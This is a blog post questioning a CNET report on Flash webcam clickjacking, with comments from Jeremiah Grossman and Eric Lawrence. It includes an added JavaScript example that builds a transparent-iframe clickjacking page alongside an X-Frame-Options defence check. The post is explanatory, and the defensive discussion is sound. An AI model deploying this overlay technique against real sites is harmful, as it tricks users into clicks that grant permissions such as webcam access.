CNET clickjacking comment

I went through the registration process for CNET, and after creating the account it said my username was already in use. So instead of asking a clarifying question at the original article, I have to make a separate blog post here and hope the reporter sees it…

Elinor Mills at CNET today mentioned Flash and webcams in a clickjacking article. I’ll snip out the relevant passages: “In a demo at CNET offices on Thursday, Grossman showed how someone could launch a clickjacking attack using Flash to spy on someone by getting them to turn on their computer Web cam without knowing it… In the Web cam demo, the iFrame created contains a Flash pop-up window that asks the user to grant permission to have the Web cam turned on. When the victim clicks the link, the Web cam is turned on and secretly begins recording everything the user does in front of the computer… In the Web cam scenario, the best defense is probably to put a post-it note or other item over the Web cam lens and to disable the microphone in the software, he said. Flash Player 10 provides some protection by preventing anything from obscuring the security permissions dialogue box, he said… More details are in a white paper on the technique, written by Grossman and Robert Hansen of SecTheory and published in September 2008.”

Key question: Were you using the current Adobe Flash Player, or the version current at the time of last year’s whitepaper?

If someone has found a new way to make a browser obscure Player’s permissions dialog, then we need to know about it. But the description above never says which Player version was used, so I can’t tell whether there’s a new issue here.

Background: What is “clickjacking”?

(a) It’s a failure in website security: a malicious third party has either hacked their own code into a site, or persuaded the site to carry third-party code through social features or advertising. Either way, a trusted website ends up hosting untrustworthy content. It’s a flaw in website integrity.

(b) It’s a failure in browser security: third-party code can hide what the reader is actually clicking on, so What You See Is NOT What You Click. Each browser vendor seems to say its offering defeats at least some of the methods used to break click integrity but not others, which makes me wonder whether any browser has truly addressed this failure in click integrity.

(c) Flash isn’t directly involved in this “What You See Is NOT What You Click” problem. It’s used as a poster child for what can happen when a compromised site takes advantage of a browser failure: in the webcam demo, the click the user thinks is harmless lands on Player’s permission dialog instead.
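To make (b) concrete, here is an added example that is not from the CNET article, the Grossman/Hansen whitepaper, or this post: a small Node script that assembles the attack page (a visible decoy button with a fully transparent, offset iframe of the target site stacked above it) and a function that mirrors the browser-side decision for the X-Frame-Options response header, the server-side defence the framed site can send (introduced in Internet Explorer 8 in early 2009; the other browsers adopted it later). The hostnames, pixel coordinates and header values are constructed for illustration.

```javascript
// Added example (not from the CNET article, the whitepaper, or this post).
// Assembles a clickjacking page and mirrors the browser's X-Frame-Options
// check. Hostnames, pixel offsets and header values are made up.

// The control the victim can see: an ordinary-looking button at (100,100).
const DECOY_LEFT = 100;
const DECOY_TOP = 100;
const DECOY_HTML =
  `<button style="position:absolute;left:${DECOY_LEFT}px;top:${DECOY_TOP}px;` +
  'width:120px;height:40px">Play video</button>';

// Escape a URL for use inside a double-quoted HTML attribute.
function attrEscape(s) {
  return String(s).replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;');
}

// Build the attack page. `targetControl` is where the real control sits inside
// the framed target document (e.g. an "Allow" button), in CSS pixels.
// The iframe is made fully transparent, stacked above the decoy, and shifted
// so that the real control lands exactly under the decoy. The browser delivers
// the click to the topmost element under the pointer, which is the invisible
// frame, not the decoy the user is looking at.
function buildClickjackPage(targetUrl, targetControl) {
  const frameStyle = [
    'position:absolute',
    `left:${DECOY_LEFT - targetControl.x}px`,
    `top:${DECOY_TOP - targetControl.y}px`,
    'width:800px',
    'height:600px',
    'opacity:0',      // invisible, yet still receives pointer events
    'z-index:2',      // above the decoy, which keeps the default z-index
    'border:0',
  ].join(';');
  return (
    '<!DOCTYPE html><html><body>' +
    DECOY_HTML +
    `<iframe src="${attrEscape(targetUrl)}" style="${frameStyle}"></iframe>` +
    '</body></html>'
  );
}

// Case-insensitive header lookup (HTTP header names are case-insensitive).
function headerValue(headers, name) {
  const want = name.toLowerCase();
  for (const key of Object.keys(headers)) {
    if (key.toLowerCase() === want) return String(headers[key]).trim();
  }
  return '';
}

// Server-side defence: the target site answers with X-Frame-Options and the
// browser refuses to render the frame. This mirrors the browser's decision.
// `topOrigin` is the origin of the page doing the framing, `frameOrigin` the
// origin of the framed response. Without the header, framing is allowed, which
// is why the overlay above works against any site that never sends it.
function framingAllowed(headers, topOrigin, frameOrigin) {
  const xfo = headerValue(headers, 'X-Frame-Options').toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return topOrigin === frameOrigin;
  return true;
}

// Stand-alone demonstration with constructed values.
const attackPage = buildClickjackPage('https://victim.example/camera-settings',
                                      { x: 340, y: 220 });
console.log(attackPage);
console.log('victim without header, framed by attacker:',
  framingAllowed({}, 'https://attacker.example', 'https://victim.example'));
console.log('victim with DENY, framed by attacker:',
  framingAllowed({ 'X-Frame-Options': 'DENY' },
                 'https://attacker.example', 'https://victim.example'));
```

The header check works from the framed site’s side: it tells the browser not to render the page inside someone else’s frame at all. Player 10’s protection described in the article works from the other direction, with the framed content refusing to show its permission dialog while something is obscuring it. Either one breaks the overlay; a target that has neither remains clickjackable in every browser that honours the transparent frame.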

Summary: There’s a new article, but it is not clear whether there’s a new issue.

2 Responses to CNET clickjacking comment

  1. Eric Lawrence says:

    Jeremiah wouldn’t 0-day you. He was demo’ing the old attack against old (unpatched) code, as he’s done at HITB and RSA. Every time I’ve seen him, he mentions that you guys fixed this particular vector.
    [jd sez: Thanks, Eric. The security staff here likes them too. I was more concerned about the way the article was phrased — confused even me!]

  2. Jeremiah Grossman says:

    To answer your question, there is nothing “new” attack-wise with regards to clickjacking or flash videojacking — nor does the article make such claims. The reason this issue remains relevant is despite the availability of Flash 10, clickjacking still represents a huge risk. Could we reasonably estimate that the number of Flash users not on v10 is in the millions if not tens of millions? Those are significant numbers and I believe they’d like to know that their webcam/mic could be enabled without their knowledge. The best way to do that is through the media.
    Furthermore the larger clickjacking issue in the browser security realm is brought to the forefront by the recent events that have transpired on Twitter. This is just a taste of what I and many others believe is yet to come. We failed to take XSS, CSRF, and SQL Injection seriously years back when we first knew about them and look where we are today. I’d prefer clickjacking not be ignored until something truly bad happens.
    [jd sez: Thanks for the confirmation, Jeremiah… appreciated! (Right now, about 10% of consumers are not yet using FP10.)]